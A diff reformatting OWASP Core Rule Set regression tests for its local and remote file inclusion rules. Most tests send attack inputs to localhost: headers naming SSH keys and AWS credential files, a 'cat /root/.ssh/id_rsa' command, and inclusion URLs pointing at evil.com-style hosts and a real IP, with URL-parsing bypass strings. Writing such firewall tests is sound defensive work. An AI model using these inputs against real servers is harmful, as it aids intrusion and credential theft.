text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "cat /root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 7 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/root/.aws/credentials" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/root/.aws/credentials" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 8 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/proc/sys/kernel/randomize_va_space" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/proc/sys/kernel/randomize_va_space" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 9 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/proc/net/tcp" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" - - test_title: 930121-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/proc/net/tcp" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] + - test_id: 10 desc: Remote File Access Attempt (930121) in REQUEST_HEADERS stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "/root/.ssh/id_rsa" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "930121" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "/root/.ssh/id_rsa" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [930121] diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml index caccac5ab..30983314c 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml @@ -1,39 +1,37 @@ --- meta: author: "Andrew Howe, azurit" - description: "None" - enabled: true - name: "930130.yaml" +rule_id: 930130 tests: - - test_title: 930130-1 + - test_id: 1 desc: "LFI via URI: /sys" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/sys/class" - version: "HTTP/1.1" - output: - log_contains: id "930130" - - test_title: 930130-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/sys/class" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] + - test_id: 2 desc: "LFI via URI: /proc" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/proc/interrupts" - version: "HTTP/1.1" - output: - log_contains: id "930130" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/proc/interrupts" + version: "HTTP/1.1" + output: + log: + expect_ids: [930130] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml index 11fc083e5..795b312ab 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml @@ -1,28 +1,26 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 931100.yaml +rule_id: 931100 tests: - - test_title: 931100-1 + - test_id: 1 desc: Remote File Inclusion Attack (931100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" - version: "HTTP/1.1" - output: - log_contains: id "931100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://66.240.183.75/crash.php" + version: "HTTP/1.1" + output: + log: + expect_ids: [931100] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml index dbb3b8fb5..146646540 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml @@ -1,70 +1,68 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 931110.yaml +rule_id: 931110 tests: - - test_title: 931110-1 + - test_id: 1 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" - - test_title: 931110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [931110] + - test_id: 2 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" - - test_title: 931110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [931110] + - test_id: 3 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [931110] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml index 44e910d55..3bf7fb547 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml @@ -1,135 +1,133 @@ --- meta: author: "studersi, azurit" - description: None - enabled: true - name: 931120.yaml +rule_id: 931120 tests: - - test_title: 931120-1 + - test_id: 1 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=file?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=file?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 2 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftp?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-3 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftp?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 3 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftps?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-4 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftps?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 4 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 5 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 6 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 7 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar?foo=bar" - version: HTTP/1.1 - output: - no_log_contains: id "931120" - - test_title: 931120-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar?foo=bar" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931120] + - test_id: 8 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar&foo=bar" - version: HTTP/1.1 - output: - no_log_contains: id "931120" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar&foo=bar" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931120] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index 36542f7d3..d67a67c03 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml @@ -1,359 +1,357 @@ --- meta: author: "studersi, azurit" - description: None - enabled: true - name: 931130.yaml +rule_id: 931130 tests: - - test_title: 931130-1 + - test_id: 1 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=file://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=file://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 2 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftp://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-3 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftp://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 3 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftps://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-4 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftps://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 4 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 5 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 6 desc: Partial match stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://evilexample.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://evilexample.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 7 desc: Mismatching domains stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com.evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com.evil.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 8 desc: Mismatching ports stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com:1234/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-9 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com:1234/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 9 desc: Matching hosts stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com/" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-10 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com/" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931130] + - test_id: 10 desc: Matching hosts and ports stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com:1234/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com:1234/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 11 desc: Subdomains stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://www.example.com/some/path" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://www.example.com/some/path" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931130] + - test_id: 12 desc: Bypass 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f:asd@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f:asd@evil.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 13 desc: Bypass 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-14 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f@evil.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 14 desc: Bypass 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-15 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: 